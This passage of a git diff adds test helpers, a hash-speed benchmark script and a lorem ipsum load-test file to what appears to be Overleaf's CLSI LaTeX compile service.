JSON.parse(body) + req.options = body + } + + return this.compile(projectId, req, callback) + } + ) + }, + + wordcount(projectId, file, callback) { + const image = undefined + Client.wordcountWithImage(projectId, file, image, callback) + }, + + wordcountWithImage(projectId, file, image, callback) { + if (callback == null) { + callback = function () {} + } + return request.get( + { + url: `${this.host}/project/${projectId}/wordcount`, + qs: { + image, + file, + }, + }, + (error, response, body) => { + if (error != null) { + return callback(error) + } + if (response.statusCode !== 200) { + return callback(new Error(`statusCode=${response.statusCode}`), body) + } + return callback(null, JSON.parse(body)) + } + ) + }, +} diff --git a/services/clsi/test/acceptance/js/helpers/ClsiApp.js b/services/clsi/test/acceptance/js/helpers/ClsiApp.js new file mode 100644 index 0000000..38308e9 --- /dev/null +++ b/services/clsi/test/acceptance/js/helpers/ClsiApp.js @@ -0,0 +1,50 @@ +// TODO: This file was created by bulk-decaffeinate. +// Fix any style issues and re-enable lint. +/* + * decaffeinate suggestions: + * DS101: Remove unnecessary use of Array.from + * DS102: Remove unnecessary code created because of implicit returns + * DS103: Rewrite code to no longer use __guard__ + * DS205: Consider reworking code to avoid use of IIFEs + * DS207: Consider shorter variations of null checks + * Full docs: https://github.com/decaffeinate/decaffeinate/blob/master/docs/suggestions.md + */ +const app = require('../../../../app') +const Settings = require('@overleaf/settings') + +module.exports = { + running: false, + initing: false, + callbacks: [], + ensureRunning(callback) { + if (callback == null) { + callback = function () {} + } + if (this.running) { + return callback() + } else if (this.initing) { + return this.callbacks.push(callback) + } else { + this.initing = true + this.callbacks.push(callback) + return app.listen( + Settings.internal.clsi.port, + Settings.internal.clsi.host, + error => { + if (error != null) { + throw error + } + this.running = true + + return (() => { + const result = [] + for (callback of Array.from(this.callbacks)) { + result.push(callback()) + } + return result + })() + } + ) + } + }, +} diff --git a/services/clsi/test/bench/hashbench.js b/services/clsi/test/bench/hashbench.js new file mode 100644 index 0000000..1e19af6 --- /dev/null +++ b/services/clsi/test/bench/hashbench.js @@ -0,0 +1,73 @@ +const ContentCacheManager = require('../../app/js/ContentCacheManager') +const fs = require('node:fs') +const crypto = require('node:crypto') +const path = require('node:path') +const os = require('node:os') +const async = require('async') +const _createHash = crypto.createHash + +const files = process.argv.slice(2) + +function test(hashType, filePath, callback) { + // override the default hash in ContentCacheManager + crypto.createHash = function (hash) { + if (hashType === 'hmac-sha1') { + return crypto.createHmac('sha1', 'a secret') + } + hash = hashType + return _createHash(hash) + } + fs.mkdtemp(path.join(os.tmpdir(), 'pdfcache'), (err, dir) => { + if (err) { + return callback(err) + } + const t0 = process.hrtime.bigint() + ContentCacheManager.update(dir, filePath, x => { + const t1 = process.hrtime.bigint() + const cold = Number(t1 - t0) / 1e6 + ContentCacheManager.update(dir, filePath, x => { + const t2 = process.hrtime.bigint() + const warm = Number(t2 - t1) / 1e6 + fs.rm(dir, { recursive: true, force: true }, err => { + if (err) { + return callback(err) + } + console.log( + 'uvthreads', + process.env.UV_THREADPOOL_SIZE, + filePath, + 'hashType', + hashType, + 'cold-start', + cold.toFixed(2), + 'ms', + 'warm-start', + warm.toFixed(2), + 'ms' + ) + callback(null, [hashType, cold, warm]) + }) + }) + }) + }) +} + +const jobs = [] +files.forEach(file => { + jobs.push(cb => { + test('md5', file, cb) + }) + jobs.push(cb => { + test('sha1', file, cb) + }) + jobs.push(cb => { + test('hmac-sha1', file, cb) + }) + jobs.push(cb => { + test('sha256', file, cb) + }) +}) + +async.timesSeries(10, (n, cb) => { + async.series(jobs, cb) +}) diff --git a/services/clsi/test/load/js/bulk.tex b/services/clsi/test/load/js/bulk.tex new file mode 100644 index 0000000..67c4772 --- /dev/null +++ b/services/clsi/test/load/js/bulk.tex @@ -0,0 +1,234 @@ + +Lorem ipsum dolor sit amet, consectetur adipiscing elit. In tincidunt mattis sapien at tempor. Mauris ac tristique erat. Praesent interdum ipsum sem, ac fermentum urna imperdiet in. Nulla tincidunt purus vitae ipsum sagittis tincidunt. Aenean id nisi ullamcorper, ultrices mi vel, iaculis nunc. Sed vel varius metus, ac eleifend mauris. Donec sed orci fringilla, fermentum nulla vehicula, sodales purus. + +Maecenas nulla quam, congue vitae pellentesque sed, bibendum eu felis. Vestibulum congue gravida diam, in venenatis nisl lacinia id. Nullam eget purus ac enim dignissim consectetur vel at dolor. Integer rhoncus nisl eu odio luctus, at placerat dolor congue. Fusce sodales molestie sem eget scelerisque. Sed eros tellus, tempor eu commodo nec, maximus imperdiet eros. Aliquam vulputate ligula non bibendum tempus. In commodo eros ante, ultrices condimentum purus finibus ut. Suspendisse at eleifend mauris, vitae tincidunt sapien. Curabitur orci ipsum, aliquet a cursus efficitur, lacinia ac ex. Integer lacinia bibendum dui ut ullamcorper. Curabitur in ultricies tellus, quis ullamcorper sem. Praesent sodales dui odio. Ut lacinia aliquet eros, ut maximus nisi. Donec sit amet dui a neque interdum dapibus. + +Ut vulputate sem in lectus porttitor ullamcorper. Nulla ut urna vitae tellus posuere aliquam vitae in odio. Praesent placerat laoreet viverra. Curabitur lacinia est lectus, eget euismod nisi viverra eget. Aliquam facilisis lectus ut tincidunt mollis. Donec ut rhoncus lorem. Vivamus ultricies venenatis congue. Etiam non risus quis leo sodales lacinia. Phasellus commodo feugiat sem quis dignissim. Nunc augue dui, bibendum sed leo vitae, malesuada vulputate sem. + +Quisque nec semper nulla. Etiam dictum blandit interdum. Morbi leo leo, scelerisque vel enim vel, egestas volutpat ligula. Maecenas ac elementum lacus. Duis molestie nunc id metus iaculis, in hendrerit massa egestas. Praesent feugiat tempor dui, sit amet ultrices dui elementum id. Suspendisse cursus accumsan diam, non imperdiet diam dapibus facilisis. Praesent blandit urna felis, eget sodales nisi dictum non. Cras finibus quis augue a venenatis. In pretium condimentum arcu, at vehicula ex gravida ut. Etiam congue urna ipsum, mattis interdum neque cursus bibendum. + +Morbi felis orci, ultricies eget magna gravida, blandit condimentum erat. Curabitur convallis quam eros, eu porta diam ornare vitae. Interdum et malesuada fames ac ante ipsum primis in faucibus. Sed eleifend convallis massa, eget tristique dolor iaculis sed. Mauris id nunc erat. Donec semper rhoncus libero sit amet rhoncus. Suspendisse cursus suscipit augue quis fermentum. Sed in maximus erat. + +Ut ultrices massa vitae lectus dictum fermentum. Cras vitae risus metus. Curabitur eleifend hendrerit dolor sit amet rutrum. Pellentesque pellentesque dolor ut felis vehicula pharetra. Nam id ante eget turpis vehicula interdum in vitae odio. Nullam nec orci interdum, commodo massa et, rutrum purus. Aenean vitae porta sem. Nam in lacinia turpis. Duis dui ligula, molestie quis sagittis sit amet, faucibus ac leo. Curabitur sit amet porta ligula. Integer et sollicitudin velit. Donec magna justo, ultricies eu nunc ut, rutrum aliquam orci. Sed in dignissim sem. Proin rutrum velit urna, eu tincidunt ipsum fermentum non. Morbi id cursus nisl. + +Curabitur sed gravida ex, posuere laoreet orci. Morbi ac lacus quis tortor faucibus feugiat. Etiam fringilla lacinia libero. Duis varius sem vel lorem euismod luctus. Fusce tincidunt quis sem in ullamcorper. Ut luctus massa aliquam hendrerit finibus. Ut venenatis, neque eu hendrerit finibus, nisl tortor venenatis eros, in imperdiet leo est quis erat. Fusce luctus posuere massa, ut fermentum sapien blandit ut. Maecenas feugiat consequat lorem, eget sagittis elit vestibulum sit amet. Vivamus molestie ante ut turpis laoreet facilisis vitae eu diam. Integer a tempor tortor. In hac habitasse platea dictumst. Quisque arcu est, blandit eu justo sed, posuere congue nisi. Aliquam magna augue, convallis ac scelerisque vel, cursus eget dui. Nam rutrum auctor odio, vel sagittis ipsum gravida vel. + +Etiam elementum placerat egestas. Morbi nec mi posuere, congue ligula eu, sagittis turpis. Fusce urna nisi, dapibus in pretium et, lobortis eu arcu. Curabitur ornare urna mauris, vitae varius nulla posuere in. Integer faucibus euismod dui, a venenatis massa vehicula sit amet. Donec fringilla tellus vitae ligula pretium mattis. Aliquam aliquet quam augue, a luctus orci euismod sed. Morbi tincidunt tincidunt nulla, eget elementum turpis congue id. Suspendisse pellentesque nulla leo, fermentum ultrices massa sollicitudin vel. Morbi vel nisl consectetur, pulvinar sapien a, accumsan diam. Morbi posuere auctor nibh, nec maximus ante tincidunt ac. Etiam ut erat consectetur, molestie est sit amet, pharetra nulla. Quisque varius vestibulum ex, eget feugiat enim molestie ac. Nulla quis imperdiet risus. + +Nullam nec tempor arcu. Duis fringilla mi at magna dignissim, quis feugiat turpis lacinia. Nunc sed aliquet ipsum. Curabitur at dolor in dui posuere ornare a ut ex. Ut congue neque quis justo iaculis, ut accumsan odio condimentum. Donec sed tempus diam. Phasellus tincidunt malesuada dui, nec gravida justo volutpat vel. Praesent mi purus, sagittis in imperdiet sed, sodales eu turpis. Nullam rutrum non lacus ac imperdiet. Ut ultrices lorem at facilisis feugiat. Morbi eros enim, tristique at nisl ut, venenatis porttitor ligula. Nullam sed diam at nibh tristique consectetur. Phasellus iaculis justo nisi, ut interdum ante rutrum sit amet. Pellentesque finibus felis blandit metus pulvinar lacinia. + +Aliquam erat volutpat. Nulla eu tortor sit amet tellus bibendum tristique eget consequat metus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut in aliquet augue. Phasellus laoreet nulla convallis finibus vehicula. Fusce et urna dui. Duis vel porta nunc. Nunc condimentum, justo at efficitur dignissim, lorem diam elementum ex, at dictum lectus sapien ac neque. Aliquam lacinia et ipsum lacinia efficitur. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Phasellus convallis urna orci, et dictum sapien porta sit amet. Maecenas euismod dolor mattis sapien vestibulum pulvinar. + +Vestibulum eget posuere purus, et viverra est. Nullam egestas massa et finibus semper. Vestibulum egestas porta ante eget maximus. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. Pellentesque bibendum magna et fermentum consequat. Duis non arcu quis justo dignissim tempus at id diam. Praesent condimentum vel leo ac efficitur. Phasellus sollicitudin ipsum ut consectetur euismod. Proin diam eros, placerat sed dui ac, porttitor pellentesque nibh. Curabitur fermentum volutpat enim, in ullamcorper ipsum euismod et. Nunc a justo tortor. Phasellus libero nunc, consectetur ut dolor non, volutpat condimentum metus. + +Ut tincidunt est sem, eu venenatis lectus pretium pretium. Vivamus venenatis, erat nec sollicitudin semper, justo nulla euismod dui, quis tempor libero lectus sit amet neque. Sed in iaculis ipsum. Quisque ultricies sed mi a consequat. Sed tincidunt ante ut turpis vehicula, sed fringilla ligula efficitur. Cras eget suscipit sapien. Ut sed malesuada est, ut tempor leo. Mauris dignissim turpis quis turpis placerat cursus. Vivamus dictum dui sed blandit aliquet. + +Ut cursus, nulla eget ultricies tempor, magna enim aliquam libero, eget tempus mauris mauris ut elit. Nulla a mi quam. Integer ullamcorper ex et enim ornare efficitur. Vivamus tellus orci, pharetra in suscipit ac, ultrices sit amet sapien. Pellentesque pretium mauris vel orci accumsan, a hendrerit lectus sagittis. Mauris id nisi commodo, eleifend arcu in, vestibulum metus. Fusce vulputate gravida tincidunt. Nulla cursus non tortor ut tincidunt. Phasellus vel nisi tempus, fringilla lectus sed, ultricies erat. Ut gravida, enim id facilisis consequat, est nisi scelerisque magna, eget pharetra elit mi elementum ligula. Morbi hendrerit tortor eget velit rhoncus, consequat porta nisl aliquet. Nam diam turpis, ullamcorper vitae nisi eu, ultrices hendrerit magna. Vivamus eget pretium elit. Vivamus vitae odio sit amet libero hendrerit imperdiet. + +Aenean pharetra ex eget lectus sodales placerat. Fusce quis orci vel est suscipit venenatis. Curabitur maximus, sem in tincidunt imperdiet, nisl lorem venenatis mauris, eget facilisis lectus mauris a eros. Nam luctus sem ac diam ultrices, eget vulputate tortor efficitur. Nunc fermentum condimentum lacus id faucibus. Nunc ut tellus pretium, mattis eros vitae, scelerisque felis. Aenean ligula nulla, vulputate id eros id, vestibulum vulputate odio. Nunc in elit id augue porttitor auctor sed vitae lacus. Integer enim orci, auctor at magna eget, viverra tempus risus. Nulla suscipit metus tortor, ultricies vestibulum odio euismod at. Etiam consequat diam ac leo dignissim vulputate. Donec lectus lorem, finibus sed purus ac, eleifend condimentum ipsum. + +Fusce ornare metus vel dui scelerisque vehicula. Proin dictum sapien nec auctor congue. Nunc id erat sed velit facilisis tincidunt. In convallis eu diam id aliquam. Suspendisse eu nisl ante. Sed sit amet arcu non erat sagittis vehicula. Quisque pellentesque at lectus quis maximus. Nam mollis nulla interdum lobortis egestas. Fusce eu tellus eget libero pretium venenatis quis tristique justo. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Proin tempor suscipit enim, eget lacinia augue malesuada sit amet. Ut ornare massa in magna pulvinar sagittis. Etiam non risus mi. Aenean aliquam dui et risus egestas aliquet. + +Aenean semper dui risus. Aenean consequat id elit a finibus. Sed vitae est sed arcu interdum maximus interdum in leo. Donec justo lorem, dictum sed placerat sit amet, eleifend in justo. Integer efficitur metus id interdum fringilla. Morbi et dui vitae libero consectetur fermentum quis sed quam. Sed interdum aliquam lorem, at blandit lectus fermentum a. Aliquam ac mollis felis, ut vulputate massa. Praesent convallis cursus eleifend. Donec non sem auctor, efficitur nisi ac, egestas libero. Nullam turpis lacus, dignissim eget pellentesque sed, fermentum ut ipsum. Vestibulum a posuere lacus, vitae rutrum neque. In hac habitasse platea dictumst. Sed vel maximus sem. Etiam dapibus risus et consectetur auctor. Phasellus vestibulum posuere sagittis. + +Aliquam nec libero at velit rhoncus pretium. Curabitur tristique blandit orci id vestibulum. Praesent in tempus arcu. Vivamus in felis tellus. Nunc ac fermentum massa. Cras nisi mi, sollicitudin eu maximus vitae, sodales gravida lorem. Vivamus mollis metus id lectus rhoncus consequat. In dui tellus, vulputate sit amet purus vel, volutpat ornare turpis. Fusce vitae massa non ligula lobortis rhoncus eget id sapien. Sed nec tempus lectus. Proin tempor risus ipsum, fermentum suscipit felis cursus sit amet. + +Maecenas ut dignissim ante, vitae ornare lorem. Fusce nec convallis eros, sed finibus urna. Proin ut finibus dolor. In non nunc sed dui aliquam suscipit. Etiam semper varius ex, sed venenatis sem gravida in. Interdum et malesuada fames ac ante ipsum primis in faucibus. Phasellus tempus aliquet placerat. Nam odio mauris, pharetra ac felis vel, ornare cursus nisl. Phasellus elit risus, finibus id ornare ut, scelerisque sed nisi. Curabitur aliquet, magna in finibus congue, dui libero auctor dui, ut fermentum metus enim vitae ex. Duis at elementum tellus. + +Suspendisse laoreet luctus sem sit amet tempor. Vestibulum non lorem fringilla, maximus nisl vel, pulvinar enim. Suspendisse egestas elit et sem sagittis rhoncus. Morbi nulla augue, semper euismod ultricies quis, maximus et lorem. Nulla nec posuere justo. Ut blandit nisl vitae turpis varius finibus. Donec porttitor eros neque, id mollis neque tempus et. Maecenas a massa placerat, laoreet nisl vel, venenatis diam. + +Phasellus at leo vel nisi aliquet placerat. Vestibulum luctus erat quis velit laoreet auctor. Aenean ultricies nulla tristique metus commodo, id fermentum justo tristique. Nullam ut tincidunt libero. Suspendisse volutpat, lacus ac congue ultricies, metus mi imperdiet magna, in maximus turpis ex eget leo. Sed lorem nibh, vestibulum id sodales ac, sagittis at elit. Curabitur purus nunc, sodales eget vehicula vitae, bibendum gravida diam. Nullam dignissim consequat pharetra. Nullam a diam consectetur, mollis odio sed, blandit lectus. Vestibulum eu velit id massa varius sagittis. Quisque tempor ante ac mauris rhoncus molestie. Pellentesque habitant morbi tristique senectus et netus et malesuada fames ac turpis egestas. + +Ut sit amet euismod mi. Nulla facilisis est posuere, feugiat est et, dictum nulla. Proin eleifend ultricies nunc. Sed commodo justo nisi, id suscipit massa malesuada ut. Donec aliquam nibh tellus, vitae gravida lectus ultricies quis. Nam pulvinar lobortis erat sit amet convallis. Sed quis magna facilisis, tincidunt dui non, hendrerit nunc. Morbi egestas, risus fringilla fermentum porttitor, nunc velit viverra mi, non sodales augue arcu ac sapien. Duis blandit urna at nisl pellentesque semper. Nulla et malesuada nulla. Aenean tristique tortor odio, sit amet luctus odio aliquam id. Phasellus facilisis lorem vitae velit aliquam imperdiet. Cras faucibus dolor eget neque fringilla, ut mattis ex hendrerit. Integer molestie porttitor sagittis. + +Pellentesque diam quam, auctor eget tristique eget, molestie sit amet est. Pellentesque a eros non dui gravida volutpat. Donec molestie blandit nunc ac interdum. Cum sociis natoque penatibus et magnis dis parturient montes, nascetur ridiculus mus. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Suspendisse lobortis, neque non aliquet convallis, lectus ex venenatis ex, quis malesuada massa erat non dolor. In tristique, enim eu ultrices ultricies, lectus ligula pretium orci, commodo cursus ante est vel odio. Sed quis accumsan purus. Nam fringilla ex ut urna vestibulum, et feugiat diam ultrices. Vivamus tempus felis ac quam blandit convallis. + +Vestibulum eros erat, volutpat in est at, blandit pharetra sapien. Interdum et malesuada fames ac ante ipsum primis in faucibus. Aenean quis enim orci. Aliquam imperdiet vel arcu ac sagittis. Mauris vitae augue sed metus commodo ornare. Nulla malesuada tellus nisl, eu vestibulum ante mollis a. Sed sagittis euismod nunc, sit amet hendrerit tortor condimentum eu. + +Praesent lacinia massa eget mi auctor placerat. Fusce porttitor augue lectus, a cursus ante dictum vel. Vestibulum ultrices vel mauris in fermentum. Nunc tincidunt non magna sed pharetra. Donec porttitor rutrum arcu, vitae tincidunt lacus suscipit ac. Aliquam lorem mauris, pulvinar non dignissim sed, pulvinar vitae dui. Donec id neque eu velit imperdiet lacinia nec eu magna. Ut a purus sit amet nulla venenatis vulputate. Integer vulputate est sem, iaculis porttitor mi mattis et. Phasellus condimentum ipsum eget tellus viverra, a tincidunt nunc feugiat. Praesent posuere aliquam ex et faucibus. Nullam pretium felis id mauris luctus, a luctus eros sodales. + +Mauris et condimentum velit. Praesent id dignissim odio. Phasellus nisl velit, molestie sed nisi et, sollicitudin tempor nisi. Pellentesque lacus eros, ultricies non leo sit amet, porttitor ullamcorper ipsum. Vestibulum maximus lorem ac justo tempus imperdiet. Suspendisse rhoncus, mi in commodo tempus, orci turpis feugiat dui, nec facilisis arcu diam ut mauris. Vestibulum risus ligula, ornare non cursus vel, pellentesque non augue. Morbi eu gravida arcu. Nunc sed fermentum lacus. Nulla id quam aliquet, aliquet lacus in, rutrum metus. Duis tristique sodales risus vel interdum. Integer rhoncus nibh eget semper malesuada. Nunc sit amet ante diam. Fusce tincidunt aliquam ex, at lobortis tellus porttitor non. Vestibulum tincidunt iaculis dui vel scelerisque. + +Aliquam sagittis mauris eget massa accumsan viverra. Pellentesque luctus sit amet augue ac scelerisque. Praesent imperdiet nisi dolor, sed malesuada est commodo at. Aenean vel leo eget felis tincidunt interdum. Fusce orci mauris, egestas eget lectus et, finibus consectetur urna. Donec ut dapibus elit, eu lacinia neque. Ut et accumsan nulla. Sed ullamcorper ligula purus, eu dapibus nunc auctor vel. Ut convallis consectetur dapibus. Curabitur eget porttitor felis. Maecenas pretium ac leo vitae volutpat. Donec in augue sit amet lorem efficitur dignissim. + +Praesent iaculis tristique rutrum. Pellentesque id odio vel purus bibendum sodales suscipit id odio. Nullam ac velit imperdiet, imperdiet nisi sed, malesuada ipsum. Quisque varius dictum efficitur. Phasellus efficitur varius imperdiet. Aenean facilisis libero non augue porttitor, nec interdum felis imperdiet. Etiam et libero id elit commodo tincidunt. Nullam rutrum odio id rutrum tristique. Cras vehicula aliquet risus ac elementum. Duis nisl urna, commodo eget ante et, vehicula tempus lacus. + +Mauris eu sapien sed erat auctor volutpat vel vel tortor. Aenean in commodo felis. Donec a dui a urna varius aliquet quis at nisi. Pellentesque et urna lacinia, commodo arcu at, laoreet lectus. Aliquam sodales, massa in convallis aliquam, dui orci eleifend arcu, a gravida mauris magna sed arcu. Ut ac lectus in risus feugiat lobortis. Nulla quis est eget dui pharetra ultricies eget at risus. Phasellus sagittis molestie ligula, eget egestas orci volutpat vitae. + +Fusce nec finibus ligula, sed volutpat tortor. Sed placerat quam fringilla augue pharetra dictum. Proin ornare mi erat, eget sollicitudin ligula venenatis vitae. Aliquam semper sagittis urna rutrum pharetra. Vivamus lacinia mattis erat, vitae ultrices arcu. Maecenas id lacus eget justo imperdiet vehicula commodo a leo. Quisque vitae eros interdum, posuere ex ornare, tincidunt lectus. + +Vestibulum hendrerit sed libero et bibendum. Sed ornare eu massa ut vestibulum. Curabitur imperdiet odio felis, at ullamcorper eros rhoncus nec. Cras commodo nisl eu augue iaculis posuere. Aliquam massa tortor, consectetur quis dui in, mollis dictum tellus. Fusce porttitor dapibus arcu. Fusce finibus pretium porttitor. + +Proin dapibus viverra nisi. Cras ullamcorper purus et consequat fermentum. Duis imperdiet in dui in imperdiet. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Aliquam quis enim at ipsum ultricies auctor scelerisque nec nulla. Vivamus ut efficitur enim. Quisque dictum quam ac dui iaculis efficitur. Morbi at nulla convallis, condimentum tellus sit amet, dapibus nunc. Morbi metus felis, commodo sit amet justo id, finibus sagittis lorem. Nam nisi diam, fermentum dapibus varius in, convallis eu leo. Phasellus ut nunc orci. Sed tincidunt mauris in ante consequat, id bibendum libero volutpat. Aliquam a dictum libero. Etiam massa odio, congue ut lorem tincidunt, elementum egestas ligula. + +Ut semper arcu a lectus interdum euismod. Curabitur nec ultrices neque. In eget sapien nulla. Pellentesque pellentesque faucibus urna id placerat. Aenean condimentum posuere interdum. Etiam vel tristique lorem, in dapibus urna. Vestibulum facilisis lobortis metus ac egestas. Vestibulum ultrices aliquet dui id efficitur. Sed a velit sed erat ultrices sodales suscipit a tortor. Nam mattis rhoncus augue et viverra. Praesent volutpat gravida enim quis sodales. + +Nam placerat nisl a ullamcorper pharetra. Sed eu eros egestas, suscipit ante id, efficitur mi. Curabitur accumsan gravida pellentesque. Vestibulum urna risus, condimentum vel libero in, porta pharetra nisi. Duis eu feugiat neque, quis condimentum dolor. Suspendisse et elementum urna. Vivamus malesuada nisi eget blandit faucibus. Duis eu lorem ac est ultrices placerat nec nec elit. Nunc sed sagittis ligula. Vivamus gravida suscipit tellus nec euismod. + +Ut posuere porta diam, vitae euismod erat egestas vitae. Aenean imperdiet quis quam eget dictum. Cras vulputate elit eu nibh scelerisque, vitae consectetur nisi malesuada. Praesent iaculis, neque nec tempor elementum, est mi egestas urna, nec commodo neque lacus vel mi. In a orci eu metus elementum tincidunt nec id tortor. Aenean augue augue, vulputate a porta quis, bibendum finibus augue. Nam condimentum ante ac congue ultrices. Praesent eu nisi eu enim accumsan scelerisque et id augue. Cras gravida dictum suscipit. Nulla tristique tempor lacus non eleifend. Curabitur sodales est in arcu accumsan, vel dignissim nunc blandit. Aenean sodales sodales lectus volutpat commodo. Maecenas venenatis accumsan nibh, sit amet semper risus ultrices non. + +In blandit iaculis dolor sit amet convallis. Aliquam quis nisl sit amet augue semper vehicula. Sed aliquam vel ex vel condimentum. Nunc diam massa, mattis ac felis vel, cursus tincidunt ligula. Aliquam erat volutpat. Quisque faucibus in metus in tempus. Ut pharetra congue tellus. Vivamus est libero, fringilla vel elit ac, rhoncus fermentum arcu. Praesent tortor diam, mattis in varius commodo, lacinia accumsan neque. Integer nec luctus nibh. Duis tincidunt velit nisi, id porttitor turpis posuere in. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam finibus tortor lectus. Curabitur condimentum orci eget urna sollicitudin vehicula. + +Donec sagittis mi lacus, quis rutrum sapien scelerisque sed. In quis interdum velit. Nulla eget tincidunt enim. Fusce viverra, sem pharetra ultricies laoreet, magna erat ornare lectus, a viverra mauris magna id mi. Quisque vitae pretium velit. Integer venenatis vel sapien non varius. Praesent eros neque, posuere sit amet posuere ut, posuere a sem. Vestibulum porttitor interdum posuere. Nam viverra felis dolor, eget ultrices lacus tincidunt a. Suspendisse elementum rhoncus tristique. Nam vehicula, odio eu porta ullamcorper, neque nunc pretium neque, ac vehicula mauris eros ac turpis. Aliquam augue nisl, pharetra non mauris id, finibus egestas massa. + +Aliquam rhoncus tortor a nunc vulputate gravida. Phasellus aliquam lorem ipsum, a suscipit orci euismod ac. Curabitur fringilla orci in ante aliquam venenatis. Ut nec sollicitudin orci. Morbi consectetur massa nec lacus vestibulum commodo. Donec quis erat at nibh scelerisque interdum. Donec sed velit molestie purus volutpat tempus. Aenean consequat, massa vitae mollis eleifend, felis ante convallis ex, quis egestas libero nisi interdum dui. Maecenas aliquet nisi quis est dapibus posuere. + +Phasellus lectus ex, finibus non orci et, suscipit fermentum orci. Vestibulum sed ligula non arcu facilisis feugiat. Praesent pellentesque eros quis eleifend tempus. In hac habitasse platea dictumst. Nulla accumsan suscipit risus, nec dignissim purus sollicitudin quis. Vestibulum vestibulum ligula non massa congue commodo. Aliquam velit ante, facilisis et aliquet non, imperdiet nec velit. Nunc vel elit felis. + +Sed sed ex ut dui cursus consectetur. Phasellus laoreet velit lacinia dui placerat tincidunt. Nullam ornare sagittis quam ac pretium. Donec imperdiet velit quis ipsum placerat, vitae lacinia felis sagittis. Aenean vitae dui fermentum, laoreet lacus egestas, faucibus libero. Maecenas blandit blandit mi, et mattis lectus placerat sollicitudin. Aliquam at semper nulla. + +Sed scelerisque lacus felis, et commodo libero tincidunt ac. Ut vel elit vel ex luctus lacinia ut et nisi. Sed ac tristique nisl. Suspendisse efficitur varius purus, sit amet gravida orci sagittis lacinia. Proin non placerat urna. Duis vehicula faucibus est vitae vehicula. Praesent vehicula tempor eros, in aliquet nisl vehicula in. Phasellus in nibh commodo, tempor magna in, convallis metus. Vivamus velit risus, scelerisque quis dolor in, finibus rhoncus erat. Vivamus ipsum libero, tempus non magna eget, condimentum tempus elit. + +Sed eu feugiat neque. In velit ex, suscipit in semper blandit, malesuada in orci. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Donec sem odio, elementum at turpis in, aliquet posuere augue. Etiam accumsan libero lorem, tempor cursus purus fringilla in. Vestibulum id diam consectetur, interdum dui vitae, accumsan tellus. Ut eu viverra nisi. Duis odio nisl, consectetur id volutpat eu, interdum a tortor. In et ipsum interdum, fringilla urna nec, congue lectus. Aliquam eu sodales neque. Vivamus et tincidunt dolor. Sed porttitor rhoncus rutrum. Nulla facilisi. + +Vivamus dapibus ipsum vitae libero ullamcorper, quis ullamcorper tortor porttitor. Phasellus elementum sapien ac felis sagittis, non finibus massa faucibus. Curabitur id enim neque. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; Aenean velit lectus, tempus placerat pretium ultricies, mollis sit amet nibh. Praesent tincidunt turpis purus, vitae malesuada sapien eleifend at. Pellentesque velit mauris, volutpat auctor pharetra at, laoreet vel mi. Duis a ornare leo, nec malesuada ante. Donec a felis nec ex varius rutrum at a libero. + +Etiam blandit nulla et lorem viverra, vitae suscipit mi luctus. Etiam enim nisl, dignissim eget lectus a, molestie hendrerit leo. Cras placerat leo nec blandit aliquet. Suspendisse id cursus metus. Aliquam a lobortis lectus, eget consequat erat. Praesent congue nulla vitae convallis pulvinar. Donec sed dui tellus. Aenean vehicula neque malesuada mi malesuada, sed lobortis nisl porttitor. Sed eu felis lacinia, fringilla nibh ac, laoreet ex. Vestibulum nibh ex, sagittis eu bibendum et, laoreet ut lectus. Proin ac augue tellus. Nulla tristique metus ut sem egestas sodales. In lorem sapien, tempor sit amet semper a, dignissim a dolor. + +Mauris finibus justo ut pretium vestibulum. Morbi euismod faucibus fringilla. Curabitur vitae dictum ipsum. Curabitur nec nulla fringilla, laoreet ligula eu, convallis magna. Proin in accumsan sem. Morbi pretium venenatis sem, vitae fringilla leo vestibulum et. Maecenas justo ligula, iaculis a finibus nec, aliquam tempor ipsum. Donec cursus nisi vel purus pulvinar, non interdum nulla semper. In eu ullamcorper odio. Sed ac augue ut urna pulvinar rhoncus. Integer maximus ultrices nisl, nec volutpat tellus facilisis eu. Fusce dictum, leo iaculis egestas consectetur, enim ligula aliquam nunc, sed condimentum neque dui eget nibh. Vestibulum ante ipsum primis in faucibus orci luctus et ultrices posuere cubilia Curae; + +Fusce vitae orci eu purus vehicula viverra. Vivamus mollis orci sed euismod sagittis. Duis dui sapien, ullamcorper in gravida nec, imperdiet sed purus. Cras ligula nulla, consectetur a urna a, luctus ultricies augue. Aliquam tincidunt, lectus eget auctor venenatis, elit tortor malesuada mauris, sed iaculis lectus libero et lectus. Aenean dictum imperdiet tortor, ac aliquet magna rhoncus sed. Mauris facilisis velit suscipit ligula tristique ullamcorper. Praesent leo mauris, rhoncus eu sodales a, lobortis nec nibh. + +Cras in libero felis. Donec luctus nunc id imperdiet consectetur. Nam ultrices suscipit mi, eu pretium urna luctus eget. Phasellus eu lacinia augue. Proin eu est condimentum ligula volutpat semper. Sed luctus, dolor quis bibendum venenatis, neque nibh condimentum felis, vitae cursus libero velit vitae lorem. Donec ultricies ullamcorper ipsum. Maecenas maximus accumsan blandit. + +Mauris aliquet, ex non facilisis tristique, nibh elit efficitur quam, et gravida sapien leo sed diam. Suspendisse malesuada odio vel lorem dignissim, eu accumsan ante egestas. Vivamus blandit erat sed fringilla euismod. Etiam nec mauris a sem finibus dapibus. Quisque hendrerit eros nec mattis ultricies. Vestibulum blandit nulla a eleifend sollicitudin. Fusce hendrerit, nunc ut cursus fermentum, arcu odio laoreet turpis, a tincidunt purus massa nec sem. Nam id tellus et eros vehicula fermentum. Nullam imperdiet rhoncus lectus, at vestibulum nunc semper luctus. Sed a massa sed urna posuere congue in sed augue. + +Nullam condimentum eget tortor in lobortis. Maecenas ac cursus tellus. Nunc mollis lorem risus, sed tincidunt sapien ullamcorper quis. In nec diam quis ligula euismod feugiat vitae eget dui. In pulvinar, arcu in molestie sodales, augue elit aliquam elit, vel dignissim quam mi maximus quam. Sed condimentum, nibh ut finibus faucibus, diam leo ultrices dolor, quis cursus nunc dolor non urna. Aliquam suscipit, magna vitae gravida porta, sem orci mattis arcu, nec fringilla dolor nunc in purus. Class aptent taciti sociosqu ad litora torquent per conubia nostra, per inceptos himenaeos. Nunc egestas cursus magna in ultrices. Maecenas quis 